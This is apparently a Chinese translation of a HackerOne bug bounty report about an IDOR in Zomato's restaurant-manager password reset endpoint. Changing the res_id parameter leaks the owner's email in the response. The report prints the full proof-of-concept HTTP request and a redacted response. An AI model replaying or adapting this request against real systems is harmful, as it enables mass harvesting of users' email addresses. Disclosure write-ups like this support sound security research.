【HackOne翻译】通过密码重置功能来泄露商家的电子邮件

摘要： 漏洞类型：访问控制不当赏金：$ 500关键词：IDOR原文链接：一、简介找一个很酷的IDOR，它再次泄漏了所有Zomato用户的电子邮件地址。...

漏洞类型：访问控制不当

赏金：$ 500

关键词：IDOR

原文链接：

一、简介

找一个很酷的IDOR，它再次泄漏了所有Zomato用户的电子邮件地址。无论您是否拥有餐厅的管理权限，此攻击都有效。

二、漏洞细节

在请求重置密码数据包时，餐馆老板的邮箱会泄露在回显的响应中。

POST请求包

POST /php/restaurant_manager_reset_password.php HTTP/1.1
Host: www.zomato.com
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Referer: https://www.zomato.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 10


res_id=2100935

响应包

{"status":"success","message":"You will receive a recovery mail at ██████████@gmail.com, if it's in our database. Please check your inbox to start the password recovery process."}

这意味着，这可以帮助攻击者从Zomato的数据库中提取数百万封电子邮件。如果攻击者可以访问此POST请求，那么这将是一个巨大的泄漏。

三、危害

这可以使攻击者从Zomato数据库提取所有电子邮件。而且我们都知道电子邮件当然也是登录名，因此考虑到业务的性质，我将其归类为巨大的泄漏。